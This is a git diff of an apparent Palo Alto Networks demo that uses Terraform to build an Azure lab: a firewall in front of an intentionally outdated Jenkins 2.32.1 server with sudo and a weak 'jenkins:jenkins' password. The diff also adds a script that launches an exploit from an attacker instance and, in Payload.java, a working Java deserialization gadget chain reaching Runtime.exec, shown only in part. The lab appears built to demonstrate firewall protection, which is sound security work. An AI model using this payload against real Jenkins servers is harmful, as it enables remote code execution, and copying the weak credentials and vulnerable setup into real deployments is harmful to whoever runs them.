+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(30)
+ call = "https://%s/api/?type=op&cmd=%s&key=%s" % (
+ fwMgtIP, jobid, api_key)
+ r = send_request(call)
+ tree = ET.fromstring(r.text)
+
+ logger.debug('Got response for show job {}'.format(r.text))
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.debug("AV install Status Complete ")
+ completed = 1
+ else:
+ status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+
+ else:
+ logger.info('Unable to determine job status')
+
+
+def getApiKey(hostname, username, password):
+ '''
+ Generate the API key from username / password
+ '''
+
+ call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password)
+
+ api_key = ""
+ while True:
+ try:
+ # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read()
+ response = send_request(call)
+
+
+ except DeployRequestException as updateerr:
+ logger.info("No response from FW. Wait 20 secs before retry")
+ time.sleep(10)
+ continue
+
+ else:
+ api_key = ET.XML(response.content)[0][0].text
+ logger.info("FW Management plane is Responding so checking if Dataplane is ready")
+ logger.debug("Response to get_api is {}".format(response))
+ return api_key
+
+
+def getFirewallStatus(fwIP, api_key):
+ fwip = fwIP
+
+ """
+ Gets the firewall status by sending the API request show chassis status.
+ :param fwMgtIP: IP Address of firewall interface to be probed
+ :param api_key: Panos API key
+ """
+
+ url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key)
+ # Send command to fw and see if it times out or we get a response
+ logger.info("Sending command 'show chassis status' to firewall")
+ try:
+ response = requests.get(url, verify=False, timeout=10)
+ response.raise_for_status()
+ except requests.exceptions.Timeout as fwdownerr:
+ logger.debug("No response from FW. So maybe not up!")
+ return 'no'
+ # sleep and check again?
+ except requests.exceptions.HTTPError as fwstartgerr:
+ '''
+ Firewall may return 5xx error when rebooting. Need to handle a 5xx response
+ raise_for_status() throws HTTPError for error responses
+ '''
+ logger.infor("Http Error: {}: ".format(fwstartgerr))
+ return 'cmd_error'
+ except requests.exceptions.RequestException as err:
+ logger.debug("Got RequestException response from FW. So maybe not up!")
+ return 'cmd_error'
+ else:
+ logger.debug("Got response to 'show chassis status' {}".format(response))
+
+ resp_header = ET.fromstring(response.content)
+ logger.debug('Response header is {}'.format(resp_header))
+
+ if resp_header.tag != 'response':
+ logger.debug("Did not get a valid 'response' string...maybe a timeout")
+ return 'cmd_error'
+
+ if resp_header.attrib['status'] == 'error':
+ logger.debug("Got an error for the command")
+ return 'cmd_error'
+
+ if resp_header.attrib['status'] == 'success':
+ # The fw responded with a successful command execution. So is it ready?
+ for element in resp_header:
+ if element.text.rstrip() == 'yes':
+ logger.info("FW Chassis is ready to accept configuration and connections")
+ return 'yes'
+ else:
+ logger.info("FW Chassis not ready, still waiting for dataplane")
+ time.sleep(10)
+ return 'almost'
+
+
+def update_status(key, value):
+ global status_output
+
+ if type(status_output) is not dict:
+ logger.info('Creating new status_output object')
+ status_output = dict()
+
+ if key is not None and value is not None:
+ status_output[key] = value
+
+ # write status to file to future tracking
+ write_status_file(status_output)
+
+
+def write_status_file(message_dict):
+ """
+ Writes the deployment state to a dict and outputs to file for status tracking
+ """
+ try:
+ message_json = json.dumps(message_dict)
+ with open('deployment_status.json', 'w+') as dpj:
+ dpj.write(message_json)
+
+ except ValueError as ve:
+ logger.error('Could not write status file!')
+ print('Could not write status file!')
+ sys.exit(1)
+
+
+def create_azure_fileshare(share_prefix, account_name, account_key):
+ # generate a unique share name to avoid overlaps in shared infra
+
+ # FIXME - Need to remove hardcoded directoty link below
+
+ d_dir = './WebInDeploy/bootstrap'
+ share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4()))
+ print('using share_name of: {}'.format(share_name))
+
+ # archive_file_path = _create_archive_directory(files, share_prefix)
+
+ try:
+ # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this
+ s = requests.Session()
+ s.verify = False
+
+ file_service = FileService(account_name=account_name, account_key=account_key, request_session=s)
+
+ # print(file_service)
+ if not file_service.exists(share_name):
+ file_service.create_share(share_name)
+
+ for d in ['config', 'content', 'software', 'license']:
+ print('creating directory of type: {}'.format(d))
+ if not file_service.exists(share_name, directory_name=d):
+ file_service.create_directory(share_name, d)
+
+ # FIXME - We only handle bootstrap files. May need to handle other dirs
+
+ if d == 'config':
+ for filename in os.listdir(d_dir):
+ print('creating file: {0}'.format(filename))
+ file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename))
+
+ except AttributeError as ae:
+ # this can be returned on bad auth information
+ print(ae)
+ return "Authentication or other error creating bootstrap file_share in Azure"
+
+ except AzureException as ahe:
+ print(ahe)
+ return str(ahe)
+ except ValueError as ve:
+ print(ve)
+ return str(ve)
+
+ print('all done')
+ return share_name
+
+
+def getServerStatus(IP):
+ """
+ Gets the server status by sending an HTTP request and checking for a 200 response code
+ """
+ global gcontext
+
+ call = ("http://" + IP + "/")
+ logger.info('URL request is {}'.format(call))
+ # Send command to fw and see if it times out or we get a response
+ count = 0
+ max_count = 15
+ while True:
+ if count < max_count:
+ try:
+ count = count + 1
+ r = send_request(call)
+ except DeployRequestException as e:
+ logger.debug("Got Invalid response".format(e))
+ else:
+ logger.info('Jenkins Server responded with HTTP 200 code')
+ return 'server_up'
+ else:
+ break
+ return 'server_down'
+
+
+def main(username, password, rg_name, azure_region):
+ username = username
+ password = password
+
+ WebInBootstrap_vars = {
+ 'RG_Name': rg_name,
+ 'Azure_Region': azure_region
+ }
+
+ WebInDeploy_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password,
+ 'Azure_Region': azure_region
+ }
+
+ WebInFWConf_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+ # Set run_plan to TRUE is you wish to run terraform plan before apply
+ run_plan = False
+ kwargs = {"auto-approve": True}
+
+ # Class Terraform uses subprocess and setting capture_output to True will capture output
+ capture_output = kwargs.pop('capture_output', False)
+
+ if capture_output is True:
+ stderr = subprocess.PIPE
+ stdout = subprocess.PIPE
+ else:
+ # if capture output is False, then everything will essentially go to stdout and stderrf
+ stderr = sys.stderr
+ stdout = sys.stdout
+ start_time = time.asctime()
+ print(f'Starting Deployment at {start_time}\n')
+
+ # Create Bootstrap
+
+ tf = Terraform(working_dir='./WebInBootstrap')
+
+ tf.cmd('init')
+ if run_plan:
+ # print('Calling tf.plan')
+ tf.plan(capture_output=False)
+ return_code1, stdout, stderr = tf.apply(vars=WebInBootstrap_vars, capture_output=capture_output,
+ skip_plan=True, **kwargs)
+
+ resource_group = tf.output('Resource_Group')
+ bootstrap_bucket = tf.output('Bootstrap_Bucket')
+ storage_account_access_key = tf.output('Storage_Account_Access_Key')
+ web_in_bootstrap_output = tf.output()
+
+ logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1))
+
+ update_status('web_in_deploy_stdout', stdout)
+ update_status('web_in_bootstrap_output', web_in_bootstrap_output)
+
+ if return_code1 != 0:
+ logger.info("WebInBootstrap failed")
+ update_status('web_in_bootstap_status', 'error')
+ update_status('web_in_bootstrap_stderr', stderr)
+ print(json.dumps(status_output))
+ exit(1)
+ else:
+ update_status('web_in_bootstrap_status', 'success')
+
+ share_prefix = 'jenkins-demo'
+
+ share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key)
+
+ WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key})
+ WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket})
+ WebInDeploy_vars.update({'RG_Name': resource_group})
+ WebInDeploy_vars.update({'Attack_RG_Name': resource_group})
+ WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name})
+
+ # Build Infrastructure
+
+ tf = Terraform(working_dir='./WebInDeploy')
+ # print("vars {}".format(WebInDeploy_vars))
+ tf.cmd('init')
+ if run_plan:
+ # print('Calling tf.plan')
+ tf.plan(capture_output=False, var=WebInDeploy_vars)
+
+ return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True,
+ **kwargs)
+
+ web_in_deploy_output = tf.output()
+
+ logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1))
+
+ update_status('web_in_deploy_stdout', stdout)
+ update_status('web_in_deploy_output', web_in_deploy_output)
+ if return_code1 != 0:
+ logger.info("WebInDeploy failed")
+ update_status('web_in_deploy_status', 'error')
+ update_status('web_in_deploy_stderr', stderr)
+ print(json.dumps(status_output))
+ exit(1)
+ else:
+ update_status('web_in_deploy_status', 'success')
+
+ albDns = tf.output('ALB-DNS')
+ fwMgt = tf.output('MGT-IP-FW-1')
+ nlbDns = tf.output('NLB-DNS')
+ fwMgtIP = tf.output('MGT-IP-FW-1')
+
+ logger.info("Got these values from output \n\n")
+ logger.info("AppGateway address is {}".format(albDns))
+ logger.info("Internal loadbalancer address is {}".format(nlbDns))
+ logger.info("Firewall Mgt address is {}".format(fwMgt))
+
+ #
+ # Check firewall is up and running
+ # #
+
+ api_key = getApiKey(fwMgtIP, username, password)
+
+ while True:
+ err = getFirewallStatus(fwMgtIP, api_key)
+ if err == 'cmd_error':
+ logger.info("Command error from fw ")
+
+ elif err == 'no':
+ logger.info("FW is not up...yet")
+ # print("FW is not up...yet")
+ time.sleep(60)
+ continue
+
+ elif err == 'almost':
+ logger.info("MGT up waiting for dataplane")
+ time.sleep(20)
+ continue
+
+ elif err == 'yes':
+ logger.info("FW is up")
+ break
+
+ logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions')
+ time.sleep(10)
+ fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password)
+ logger.info("Updating firewall with latest content pack")
+
+ update_fw(fwMgtIP, api_key)
+
+ #
+ # Configure Firewall
+ #
+ WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP})
+ tf = Terraform(working_dir='./WebInFWConf')
+ tf.cmd('init')
+ kwargs = {"auto-approve": True}
+
+ logger.info("Applying addtional config to firewall")
+
+ WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt
+
+ if run_plan:
+ tf.plan(capture_output=capture_output, var=WebInFWConf_vars)
+
+ # update initial vars with generated fwMgt ip
+
+ return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True,
+ var=WebInFWConf_vars, **kwargs)
+
+ web_in_fw_conf_out = tf.output()
+
+ update_status('web_in_fw_conf_output', web_in_fw_conf_out)
+ # update_status('web_in_fw_conf_stdout', stdout)
+
+ logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2))
+
+ if return_code2 != 0:
+ logger.error("WebInFWConf failed")
+ update_status('web_in_fw_conf_status', 'error')
+ update_status('web_in_fw_conf_stderr', stderr)
+ print(json.dumps(status_output))
+ exit(1)
+ else:
+ update_status('web_in_fw_conf_status', 'success')
+
+ logger.info("Commit changes to firewall")
+
+ fw.commit()
+ logger.info("waiting for commit")
+ time.sleep(60)
+ logger.info("waiting for commit")
+
+ #
+ # Check Jenkins
+ #
+
+ logger.info('Checking if Jenkins Server is ready')
+
+ # FIXME - add outputs for all 3 dirs
+
+ res = getServerStatus(albDns)
+
+ if res == 'server_up':
+ logger.info('Jenkins Server is ready')
+ logger.info('\n\n ### Deployment Complete ###')
+ logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns))
+ else:
+ logger.info('Jenkins Server is down')
+ logger.info('\n\n ### Deployment Complete ###')
+
+ # dump out status to stdout
+ print(json.dumps(status_output))
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Get Terraform Params')
+ parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+ parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+ parser.add_argument('-r', '--resource_group', help='Resource Group', required=True)
+ parser.add_argument('-j', '--azure_region', help='Azure Region', required=True)
+
+ args = parser.parse_args()
+ username = args.username
+ password = args.password
+ resource_group = args.resource_group
+ azure_region = args.azure_region
+
+ main(username, password, resource_group, azure_region)
diff --git a/azure/Jenkins_proj-working/destroy-old.py b/azure/Jenkins_proj-working/destroy-old.py
new file mode 100644
index 00000000..305e8925
--- /dev/null
+++ b/azure/Jenkins_proj-working/destroy-old.py
@@ -0,0 +1,121 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage:
+git
+python destroy.py
+
+"""
+
+import argparse
+import logging
+
+from python_terraform import Terraform
+
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+
+def main(username, password):
+ username = username
+ password = password
+
+ WebInDeploy_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+ WebInBootstrap_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+ albDns = ''
+ nlbDns = ''
+ fwMgt = ''
+
+ # Set run_plan to TRUE is you wish to run terraform plan before apply
+ run_plan = False
+ deployment_status = {}
+ kwargs = {"auto-approve": True}
+
+ #
+ # Destroy Infrastructure
+ #
+ tf = Terraform(working_dir='./WebInDeploy')
+ rg_name = tf.output('RG_Name')
+
+ attack_rg_name = tf.output('Attacker_RG_Name')
+ logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name))
+
+ WebInDeploy_vars.update({'RG_Name': rg_name})
+ WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name})
+
+ if run_plan:
+ print('Calling tf.plan')
+ tf.plan(capture_output=False)
+
+ return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs)
+ # return_code1 =0
+ print('Got return code {}'.format(return_code1))
+
+ if return_code1 != 0:
+ logger.info("Failed to destroy build ")
+
+ exit()
+ else:
+
+ logger.info("Destroyed WebInDeploy ")
+
+ WebInBootstrap_vars.update({'RG_Name': rg_name})
+ WebInBootstrap_vars.update({'Attack_RG_Name': attack_rg_name})
+
+ tf = Terraform(working_dir='./WebInBootstrap')
+
+ if run_plan:
+ print('Calling tf.plan')
+ tf.plan(capture_output=False)
+
+ return_code1, stdout, stderr = tf.cmd('destroy', var=WebInBootstrap_vars, capture_output=False, **kwargs)
+ # return_code1 =0
+ print('Got return code {}'.format(return_code1))
+
+ if return_code1 != 0:
+ logger.info("WebInBootstrap destroyed")
+ deployment_status = {'WebInDeploy': 'Fail'}
+
+ exit()
+ else:
+ deployment_status = {'WebInDeploy': 'Success'}
+ exit()
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Get Terraform Params')
+ parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+ parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+
+ args = parser.parse_args()
+ username = args.username
+ password = args.password
+
+ main(username, password)
diff --git a/azure/Jenkins_proj-working/destroy.py b/azure/Jenkins_proj-working/destroy.py
new file mode 100644
index 00000000..3bc6b81b
--- /dev/null
+++ b/azure/Jenkins_proj-working/destroy.py
@@ -0,0 +1,125 @@
+
+from azure.cli.core import get_default_cli
+import sys
+import tempfile
+import argparse
+import logging
+import subprocess
+import os
+
+from python_terraform import Terraform
+
+logger = logging.getLogger()
+# handler = logging.StreamHandler()
+# formatter = logging.Formatter('%(levelname)-8s %(message)s')
+# handler.setFormatter(formatter)
+# logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+
+#
+# Usage azure_login.py -g rgname
+#
+
+sys.sterr = sys.stdout
+
+print('Logging in to Azure using device code')
+
+def run_cmd(cmd):
+ subprocess.call('az login', shell=True)
+ res = subprocess.call(cmd, shell=True)
+ print ('Result is {}'.format(res))
+
+
+def delete_file(fpath):
+ if os.path.exists(fpath):
+ try:
+ os.remove(fpath)
+ print ('Removed state file {}'.format(fpath))
+ except Exception as e:
+ print ('Unable to delete the file {} got error {}'.format(fpath, e))
+ else:
+ print('No need to delete {} as it no longer exists'.format(fpath))
+
+def az_cli(args_str):
+ temp = tempfile.TemporaryFile()
+ args = args_str.split()
+ logger.debug('Sending cli command {}'.format(args))
+ code = get_default_cli().invoke(args, None, temp)
+ # temp.seek(0)
+ data = temp.read().strip()
+ temp.close()
+ return [code, data]
+
+def delete_rg(rg_name):
+ logger.info('Deleting resource group {}'.format(rg_name))
+ cmd = 'group delete --name ' + rg_name + ' --yes'
+ code, data = az_cli(cmd)
+ if code == 0:
+ print ('Successfully deleted Rg {} {}'.format(code,rg_name))
+
+def delete_state_files(working_dir, file_list):
+ """
+
+ :param working_dir: string
+ :param tfstate_files: list of files
+ :return: True or False
+
+ Removes a list of files from a directory
+
+ """
+ for file_name in file_list:
+ fpath = working_dir + file_name
+ if os.path.exists(fpath):
+ delete_file(fpath)
+ else:
+ print('Already deleted file {}'.format(fpath))
+
+def main (username, password):
+ #get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout)
+ #
+ # Destroy Infrastructure
+ #
+ tfstate_file = 'terraform.tfstate'
+ tfstate_files = ['terraform.tfstate', 'terraform.tfstate.backup']
+
+ fpath = './WebInDeploy/' + tfstate_file
+ if os.path.isfile(fpath):
+ tf = Terraform(working_dir='./WebInDeploy')
+ rg_name = tf.output('RG_Name')
+ rg_name1 = tf.output('Attacker_RG_Name')
+ delete_rg_cmd = 'group delete --name ' + rg_name + ' --yes'
+ az_cli(delete_rg_cmd)
+ #
+ # Delete state files WebInDeploy
+ #
+ delete_state_files('./WebInDeploy/', tfstate_files)
+
+
+ fpath = './WebInBootstrap/' + tfstate_file
+ if os.path.isfile(fpath):
+ delete_rg_cmd = 'group delete --name ' + rg_name1 + ' --yes'
+ az_cli(delete_rg_cmd)
+ #
+ # Delete state files WebInBootstrap
+ #
+ delete_state_files('./WebInBootstrap/', tfstate_files)
+
+
+ #
+ # Delete state files WebInFWConf
+ #
+ delete_state_files('./WebInFWConf/', tfstate_files)
+
+
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Get Terraform Params')
+ parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+ parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+ args = parser.parse_args()
+ username = args.username
+ password = args.password
+ # get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout)
+ main(username, password)
diff --git a/azure/Jenkins_proj-working/jenkins/Dockerfile b/azure/Jenkins_proj-working/jenkins/Dockerfile
new file mode 100644
index 00000000..1dea80e9
--- /dev/null
+++ b/azure/Jenkins_proj-working/jenkins/Dockerfile
@@ -0,0 +1,38 @@
+FROM openjdk:8-jdk
+
+MAINTAINER jamie-b
+
+RUN apt-get update && apt-get install -y git curl wget netcat nmap net-tools sudo && rm -rf /var/lib/apt/lists/*
+
+
+ENV JENKINS_HOME /var/jenkins_home
+ENV COPY_REFERENCE_FILE_LOG $JENKINS_HOME/copy_reference_file.log
+
+RUN groupadd -g 1000 jenkins \
+ && useradd -d "$JENKINS_HOME" -u 1000 -g 1000 -m -s /bin/bash jenkins \
+ && adduser jenkins sudo \
+ && echo 'jenkins:jenkins' | chpasswd
+
+ENV TINI_VERSION v0.14.0
+ADD https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/jenkins/tini?raw=true /bin/tini
+RUN chmod +x /bin/tini
+
+ENV JENKINS_VERSION 2.32.1
+RUN set -ex \
+ && [ -e /usr/share/jenkins ] || mkdir -p /usr/share/jenkins \
+ && [ -e /usr/share/jenkins/ref ] || mkdir -p /usr/share/jenkins/ref \
+ && wget https://s3.amazonaws.com/jenkinsploit/jenkins-2-32.war -O /usr/share/jenkins/jenkins.war -q --progress=bar:force:noscroll --show-progress \
+ && chown -R jenkins "$JENKINS_HOME" /usr/share/jenkins/ref
+
+EXPOSE 8080
+EXPOSE 50000
+
+COPY jenkins.sh /usr/local/bin/jenkins.sh
+
+RUN chmod +x /usr/local/bin/jenkins.sh
+
+USER root
+
+ENTRYPOINT ["/bin/tini", "--"]
+
+CMD ["/usr/local/bin/jenkins.sh"]
diff --git a/azure/Jenkins_proj-working/jenkins/config.xml b/azure/Jenkins_proj-working/jenkins/config.xml
new file mode 100644
index 00000000..071c4fb7
--- /dev/null
+++ b/azure/Jenkins_proj-working/jenkins/config.xml
@@ -0,0 +1,35 @@
+
+
+ admin admin
+
+
+ N2ooq1C0iCP+SERJA63imvGjKrB40ORk7hFGe9ItYuT0iVVj/0rJDQKpVBfS6PMq
+
+
+
+
+
+ All
+ false
+ false
+
+
+
+
+
+ default
+
+
+
+
+
+ false
+
+
+ bcrypt:768e02f82c2e957c0aa638bbee6bcc49d5c7f1d8a67d1a838b0945ce144e6e46
+
+
+ admin@admin.com
+
+
+
diff --git a/azure/Jenkins_proj-working/jenkins/docker-compose.yml b/azure/Jenkins_proj-working/jenkins/docker-compose.yml
new file mode 100644
index 00000000..61334042
--- /dev/null
+++ b/azure/Jenkins_proj-working/jenkins/docker-compose.yml
@@ -0,0 +1,11 @@
+version: '3'
+services:
+ jenkins:
+ build: .
+ container_name: jenkins
+ environment:
+ JAVA_OPTS: "-Djava.awt.headless=true"
+ JAVA_OPTS: "-Djenkins.install.runSetupWizard=false"
+ ports:
+ - "50000:50000"
+ - "8080:8080"
diff --git a/azure/Jenkins_proj-working/jenkins/jenkins.sh b/azure/Jenkins_proj-working/jenkins/jenkins.sh
new file mode 100644
index 00000000..b44f6ba2
--- /dev/null
+++ b/azure/Jenkins_proj-working/jenkins/jenkins.sh
@@ -0,0 +1,24 @@
+#! /bin/bash -e
+
+: "${JENKINS_HOME:="/var/jenkins_home"}"
+touch "${COPY_REFERENCE_FILE_LOG}" || { echo "Can not write to ${COPY_REFERENCE_FILE_LOG}. Wrong volume permissions?"; exit 1; }
+echo "--- Copying files at $(date)" >> "$COPY_REFERENCE_FILE_LOG"
+
+# if `docker run` first argument start with `--` the user is passing jenkins launcher arguments
+if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then
+
+ # read JAVA_OPTS and JENKINS_OPTS into arrays
+ java_opts_array=()
+ while IFS= read -r -d '' item; do
+ java_opts_array+=( "$item" )
+ done < <([[ $JAVA_OPTS ]] && xargs printf '%s\0' <<<"$JAVA_OPTS")
+
+ jenkins_opts_array=( )
+ while IFS= read -r -d '' item; do
+ jenkins_opts_array+=( "$item" )
+ done < <([[ $JENKINS_OPTS ]] && xargs printf '%s\0' <<<"$JENKINS_OPTS")
+
+ exec java "${java_opts_array[@]}" -jar /usr/share/jenkins/jenkins.war "${jenkins_opts_array[@]}" "$@"
+fi
+
+exec "$@"
diff --git a/azure/Jenkins_proj-working/jenkins/tini b/azure/Jenkins_proj-working/jenkins/tini
new file mode 100644
index 00000000..4e5b36a9
Binary files /dev/null and b/azure/Jenkins_proj-working/jenkins/tini differ
diff --git a/azure/Jenkins_proj-working/launch_attack_vector.py b/azure/Jenkins_proj-working/launch_attack_vector.py
new file mode 100644
index 00000000..dce17b39
--- /dev/null
+++ b/azure/Jenkins_proj-working/launch_attack_vector.py
@@ -0,0 +1,72 @@
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from python_terraform import Terraform
+import json
+import sys
+
+
+def get_terraform_outputs() -> dict:
+ tf = Terraform(working_dir='./WebInDeploy')
+ rc, out, err = tf.cmd('output', '-json')
+
+ if rc == 0:
+ try:
+ return json.loads(out)
+ except ValueError as ve:
+ print('Could not parse terraform outputs!')
+ return dict()
+
+
+def main(attack_vector: str) -> None:
+
+ print('Attempting to launch exploit...\n')
+ outputs = get_terraform_outputs()
+ print(outputs)
+ if attack_vector == 'native':
+ print('Using native waf protected attack vector...\n')
+ target = outputs['NATIVE-DNS']['value']
+ elif attack_vector == 'panos':
+ print('Using PAN-OS protected attack vector...\n')
+ target = outputs['ALB-DNS']['value']
+ else:
+ print('malformed outputs!')
+ target = '127.0.0.1'
+ if 'ATTACKER_IP' not in outputs:
+ print('No attacker ip found in tf outputs!')
+ sys.exit(1)
+
+ attacker = outputs['ATTACKER_IP']['value']
+ payload = dict()
+ payload['attacker'] = attacker
+ payload['target'] = target
+
+ headers = dict()
+ headers['Content-Type'] = 'application/json'
+ headers['Accept'] = '*/*'
+
+ try:
+ resp = requests.post(f'http://{attacker}:5000/launch', data=json.dumps(payload), headers=headers)
+ if resp.status_code == 200:
+ print('Exploit Successfully Launched!\n')
+ print(resp.text)
+ sys.exit(0)
+ else:
+ print('Could not Launch Exploit!\n')
+ print(resp.text)
+ sys.exit(0)
+ except ConnectionRefusedError as cre:
+ print('Could not connect to attacker instance!')
+ sys.exit(1)
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Launch Jenkins Attack CnC')
+ parser.add_argument('-c', '--vector', help='Attack Vector', required=True)
+
+ args = parser.parse_args()
+ vector = args.vector
+
+ main(vector)
+
diff --git a/azure/Jenkins_proj-working/payload/Payload.java b/azure/Jenkins_proj-working/payload/Payload.java
new file mode 100644
index 00000000..cbd4c8b5
--- /dev/null
+++ b/azure/Jenkins_proj-working/payload/Payload.java
@@ -0,0 +1,189 @@
+import java.io.FileOutputStream;
+import java.io.ObjectOutputStream;
+import java.io.ObjectStreamException;
+import java.io.Serializable;
+import java.lang.reflect.Field;
+import java.security.KeyPair;
+import java.security.KeyPairGenerator;
+import java.security.PrivateKey;
+import java.security.PublicKey;
+import java.security.Signature;
+import java.security.SignedObject;
+import java.util.Comparator;
+import java.util.HashMap;
+import java.util.HashSet;
+import java.util.Map;
+import java.util.concurrent.ConcurrentSkipListSet;
+import java.util.concurrent.CopyOnWriteArraySet;
+
+import net.sf.json.JSONArray;
+
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.collection.AbstractCollectionDecorator;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+import org.apache.commons.collections.map.ReferenceMap;
+import org.apache.commons.collections.set.ListOrderedSet;
+
+public class Payload implements Serializable {
+
+ private Serializable payload;
+
+ public Payload(String cmd) throws Exception {
+
+ this.payload = this.setup(cmd);
+
+ }
+
+ public Serializable setup(String cmd) throws Exception {
+ final String[] execArgs = new String[] { cmd };
+
+ final Transformer[] transformers = new Transformer[] {
+ new ConstantTransformer(Runtime.class),
+ new InvokerTransformer("getMethod", new Class[] { String.class,
+ Class[].class }, new Object[] { "getRuntime",
+ new Class[0] }),
+ new InvokerTransformer("invoke", new Class[] { Object.class,
+ Object[].class }, new Object[] { null, new Object[0] }),
+ new InvokerTransformer("exec", new Class[] { String.class },
+ execArgs), new ConstantTransformer(1) };
+
+ Transformer transformerChain = new ChainedTransformer(transformers);
+
+ final Map innerMap = new HashMap();
+
+ final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
+
+ TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
+
+ HashSet map = new HashSet(1);
+ map.add("foo");
+ Field f = null;
+ try {
+ f = HashSet.class.getDeclaredField("map");
+ } catch (NoSuchFieldException e) {
+ f = HashSet.class.getDeclaredField("backingMap");
+ }
+
+ f.setAccessible(true);
+ HashMap innimpl = (HashMap) f.get(map);
+
+ Field f2 = null;
+ try {
+ f2 = HashMap.class.getDeclaredField("table");
+ } catch (NoSuchFieldException e) {
+ f2 = HashMap.class.getDeclaredField("elementData");
+ }
+
+ f2.setAccessible(true);
+ Object[] array2 = (Object[]) f2.get(innimpl);
+
+ Object node = array2[0];
+ if (node == null) {
+ node = array2[1];
+ }
+
+ Field keyField = null;
+ try {
+ keyField = node.getClass().getDeclaredField("key");
+ } catch (Exception e) {
+ keyField = Class.forName("java.util.MapEntry").getDeclaredField(
+ "key");
+ }
+
+ keyField.setAccessible(true);
+ keyField.set(node, entry);
+
+ KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA");
+ keyPairGenerator.initialize(1024);
+ KeyPair keyPair = keyPairGenerator.genKeyPair();
+ PrivateKey privateKey = keyPair.getPrivate();
+ PublicKey publicKey = keyPair.getPublic();
+
+ Signature signature = Signature.getInstance(privateKey.getAlgorithm());
+ SignedObject payload = new SignedObject(map, privateKey, signature);
+ JSONArray array = new JSONArray();
+
+ array.add("asdf");
+
+ ListOrderedSet set = new ListOrderedSet();
+ Field f1 = AbstractCollectionDecorator.class
+ .getDeclaredField("collection");
+ f1.setAccessible(true);
+ f1.set(set, array);
+
+ DummyComperator comp = new DummyComperator();
+ ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp);
+ csls.add(payload);
+
+ CopyOnWriteArraySet a1 = new CopyOnWriteArraySet();
+ CopyOnWriteArraySet a2 = new CopyOnWriteArraySet();
+
+ a1.add(set);
+ Container c = new Container(csls);
+ a1.add(c);
+
